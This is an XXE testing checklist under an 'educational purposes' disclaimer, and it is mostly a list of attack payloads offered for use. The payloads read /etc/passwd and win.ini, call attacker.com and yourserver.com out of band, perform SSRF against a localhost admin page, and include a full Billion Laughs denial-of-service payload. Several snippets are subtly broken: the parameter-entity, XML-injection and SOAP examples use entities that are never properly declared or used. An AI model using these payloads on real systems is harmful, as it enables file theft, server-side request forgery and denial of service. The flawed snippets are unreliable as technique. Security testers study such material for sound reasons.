Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

  1. Initial Information Gathering

    • Identify and map all endpoints that accept XML input.
    • Review source code (if available) to understand XML parsing mechanisms.
    • Check for user inputs in XML request bodies, SOAP messages, and API endpoints.

  2. Basic XXE Testing

    • Test with a basic XXE payload to identify vulnerabilities: 
      <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
    • Inject the payload in different parts of the XML (e.g., elements, attributes).

  3. XXE Payloads

    • Test for blind XXE using out-of-band (OOB) techniques: 
      <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe" >]>
<foo>&xxe;</foo>
    • Test for SSRF (Server-Side Request Forgery): 
      <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin" >]>
<foo>&xxe;</foo>
    • Test for file inclusion vulnerabilities with common files:
      • /etc/passwd
      • /etc/hosts
      • C:\Windows\win.ini

  4. Parameter Entities and XML Injection

    • Test with parameter entities: 
      <!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
  <!ENTITY xxe "<!ENTITY evil SYSTEM 'file:///etc/passwd' >" >]>
<foo>&xxe;</foo>
    • Test XML injection to manipulate the structure and content: 
      <root>
  <data>
    <xxe>&xxe;</xxe>
  </data>
</root>

  5. Recursive Entities

    • Test for recursive entity expansion (Billion Laughs Attack): 
      <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

  6. Out-of-Band (OOB) Detection

    • Set up an OOB endpoint to detect blind XXE: 
      <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://yourserver.com/xxe" >]>
<foo>&xxe;</foo>
    • Use tools like Burp Collaborator to capture OOB interactions.

  7. Error Handling and Response Analysis

    • Analyze server responses for clues about XXE vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.

  8. SOAP Services

    • Test SOAP-based services for XXE vulnerabilities: 
      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>